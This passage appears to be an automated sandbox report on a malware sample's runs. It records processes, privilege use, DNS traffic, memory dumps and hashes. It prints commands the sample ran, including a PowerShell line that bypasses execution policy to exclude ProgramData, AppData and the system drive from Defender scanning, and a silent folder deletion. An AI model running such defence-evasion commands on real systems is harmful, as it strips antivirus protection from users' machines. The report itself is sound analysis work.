51d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe

"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /K rd /s /q "C:\Users\Admin\AppData\Roaming\services" & EXIT

Network

Country Destination Domain Proto
US 8.8.8.8:53 79.121.231.20.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 3.173.189.20.in-addr.arpa udp

Files

memory/216-2-0x00000000029E0000-0x0000000002A16000-memory.dmp

memory/216-4-0x0000000006750000-0x0000000006760000-memory.dmp

memory/216-5-0x0000000006750000-0x0000000006760000-memory.dmp

memory/216-3-0x0000000072590000-0x0000000072C7E000-memory.dmp

memory/216-6-0x0000000006D90000-0x00000000073B8000-memory.dmp

memory/216-7-0x0000000006B10000-0x0000000006B32000-memory.dmp

memory/216-8-0x00000000074C0000-0x0000000007526000-memory.dmp

memory/216-9-0x0000000006CB0000-0x0000000006D16000-memory.dmp

memory/216-10-0x00000000075F0000-0x0000000007940000-memory.dmp

memory/216-11-0x0000000007530000-0x000000000754C000-memory.dmp

memory/216-12-0x0000000007AD0000-0x0000000007B1B000-memory.dmp

memory/216-13-0x0000000007D20000-0x0000000007D96000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nyf2y54q.0jq.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/216-30-0x000000007E570000-0x000000007E580000-memory.dmp

memory/216-31-0x0000000008DA0000-0x0000000008DD3000-memory.dmp

memory/216-32-0x0000000070FB0000-0x0000000070FFB000-memory.dmp

memory/216-33-0x0000000008D80000-0x0000000008D9E000-memory.dmp

memory/216-38-0x0000000008DE0000-0x0000000008E85000-memory.dmp

memory/216-39-0x0000000006750000-0x0000000006760000-memory.dmp

memory/216-40-0x00000000090A0000-0x0000000009134000-memory.dmp

memory/216-233-0x0000000006870000-0x000000000688A000-memory.dmp

memory/216-238-0x0000000006860000-0x0000000006868000-memory.dmp

memory/216-254-0x0000000072590000-0x0000000072C7E000-memory.dmp

Analysis: behavioral18

Detonation Overview

Submitted

2024-02-23 10:15

Reported

2024-02-23 10:22

Platform

win10-20240221-en

Max time kernel

128s

Max time network

136s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\Data\YXNOU01Xhpmc.ps1

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\Data\YXNOU01Xhpmc.ps1

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x234

Network

Country Destination Domain Proto
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 123.10.44.20.in-addr.arpa udp

Files

memory/1376-5-0x00007FF9C4B90000-0x00007FF9C557C000-memory.dmp

memory/1376-4-0x00000114708F0000-0x0000011470912000-memory.dmp

memory/1376-6-0x0000011470960000-0x0000011470970000-memory.dmp

memory/1376-9-0x0000011470DF0000-0x0000011470E66000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3riaytwg.avm.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/1376-30-0x0000011470960000-0x0000011470970000-memory.dmp

memory/1376-36-0x00007FF9C4B90000-0x00007FF9C557C000-memory.dmp

Analysis: behavioral23

Detonation Overview

Submitted

2024-02-23 10:15

Reported

2024-02-23 10:22

Platform

win10-20240221-en

Max time kernel

128s

Max time network

137s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\TCLZMA64.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\TCLZMA64.dll,#1

Network

Country Destination Domain Proto
US 138.91.171.81:80 tcp
US 8.8.8.8:53 129.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 11.173.189.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral25

Detonation Overview

Submitted

2024-02-23 10:15

Reported

2024-02-23 10:23

Platform

win10-20240221-en

Max time kernel

119s

Max time network

138s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\TCshareWin10x64.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\TCshareWin10x64.dll,#1

Network

Country Destination Domain Proto
US 20.231.121.79:80 tcp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 169.117.168.52.in-addr.arpa udp
US 8.8.8.8:53 189.178.17.96.in-addr.arpa udp

Files

N/A

Analysis: behavioral28

Detonation Overview

Submitted

2024-02-23 10:15

Reported

2024-02-23 10:22

Platform

win10-20240221-en

Max time kernel

115s

Max time network

140s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\Tools\dkAdSRKzVAXO.ps1

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\Tools\dkAdSRKzVAXO.ps1

Network

Country Destination Domain Proto
US 8.8.8.8:53 96.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 209.143.182.52.in-addr.arpa udp

Files

memory/4848-4-0x00007FFDE2120000-0x00007FFDE2B0C000-memory.dmp

memory/4848-5-0x000002ADE9E90000-0x000002ADE9EA0000-memory.dmp

memory/4848-7-0x000002ADE9E90000-0x000002ADE9EA0000-memory.dmp

memory/4848-6-0x000002ADE9EA0000-0x000002ADE9EC2000-memory.dmp

memory/4848-10-0x000002ADEA050000-0x000002ADEA0C6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_edausfig.gxw.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4848-32-0x000002ADE9E90000-0x000002ADE9EA0000-memory.dmp

memory/4848-34-0x00007FFDE2120000-0x00007FFDE2B0C000-memory.dmp

memory/4848-35-0x000002ADE9E90000-0x000002ADE9EA0000-memory.dmp

memory/4848-36-0x000002ADE9E90000-0x000002ADE9EA0000-memory.dmp

memory/4848-37-0x000002ADE9E90000-0x000002ADE9EA0000-memory.dmp

Analysis: behavioral31

Detonation Overview

Submitted

2024-02-23 10:15

Reported

2024-02-23 10:22

Platform

win10-20240221-en

Max time kernel

124s

Max time network

132s

Command Line

"C:\Users\Admin\AppData\Local\Temp\data\WCMICONS.exe"

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\data\WCMICONS.exe

Processes

C:\Users\Admin\AppData\Local\Temp\data\WCMICONS.exe

"C:\Users\Admin\AppData\Local\Temp\data\WCMICONS.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 228 -s 232

Network

Country Destination Domain Proto
US 8.8.8.8:53 241.110.86.104.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 7.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp

Files

N/A

Analysis: behavioral22

Detonation Overview

Submitted

2024-02-23 10:15

Reported

2024-02-23 10:22

Platform

win10-20240221-en

Max time kernel

128s

Max time network

136s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\TC7Z64.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\TC7Z64.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 129.134.221.88.in-addr.arpa udp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 88.65.42.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp

Files

N/A

Analysis: behavioral24

Detonation Overview

Submitted

2024-02-23 10:15

Reported

2024-02-23 10:23

Platform

win10-20240221-en

Max time kernel

121s

Max time network

140s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\TCUNZL64.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\TCUNZL64.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 12.173.189.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-02-23 10:15

Reported

2024-02-23 10:22

Platform

win10-20240221-en

Max time kernel

117s

Max time network

143s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\Xfh5GWnGPMjT.ps1

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\Xfh5GWnGPMjT.ps1

Network

Country Destination Domain Proto
US 8.8.8.8:53 96.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 85.65.42.20.in-addr.arpa udp

Files

memory/3700-4-0x000001A277410000-0x000001A277432000-memory.dmp

memory/3700-7-0x000001A2776D0000-0x000001A277746000-memory.dmp

memory/3700-8-0x00007FFC0F980000-0x00007FFC1036C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_axv4kz30.xqb.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/3700-18-0x000001A277440000-0x000001A277450000-memory.dmp

memory/3700-17-0x000001A277440000-0x000001A277450000-memory.dmp

memory/3700-31-0x000001A277440000-0x000001A277450000-memory.dmp

memory/3700-34-0x00007FFC0F980000-0x00007FFC1036C000-memory.dmp

memory/3700-35-0x000001A277440000-0x000001A277450000-memory.dmp

memory/3700-36-0x000001A277440000-0x000001A277450000-memory.dmp

memory/3700-37-0x000001A277440000-0x000001A277450000-memory.dmp

Analysis: behavioral8

Detonation Overview

Submitted

2024-02-23 10:15

Reported

2024-02-23 10:22

Platform

win10-20240221-en

Max time kernel

128s

Max time network

137s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\kGCFZO6TPVYy.ps1

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\kGCFZO6TPVYy.ps1

Network

Country Destination Domain Proto
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 131.72.42.20.in-addr.arpa udp

Files

memory/1080-4-0x00000198FE510000-0x00000198FE532000-memory.dmp

memory/1080-5-0x00007FF881A50000-0x00007FF88243C000-memory.dmp

memory/1080-6-0x00000198FE490000-0x00000198FE4A0000-memory.dmp

memory/1080-7-0x00000198FE490000-0x00000198FE4A0000-memory.dmp

memory/1080-10-0x00000198FE6C0000-0x00000198FE736000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_p1jkdy1s.3q4.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/1080-31-0x00000198FE490000-0x00000198FE4A0000-memory.dmp

memory/1080-35-0x00007FF881A50000-0x00007FF88243C000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2024-02-23 10:15

Reported

2024-02-23 10:22

Platform

win10-20240221-en

Max time kernel

128s

Max time network

137s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 200.79.70.13.in-addr.arpa udp

Files

N/A

Analysis: behavioral12

Detonation Overview

Submitted

2024-02-23 10:15

Reported

2024-02-23 10:23

Platform

win10-20240221-en

Max time kernel

119s

Max time network

137s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa udp
US 8.8.8.8:53 28.73.42.20.in-addr.arpa udp

Files

N/A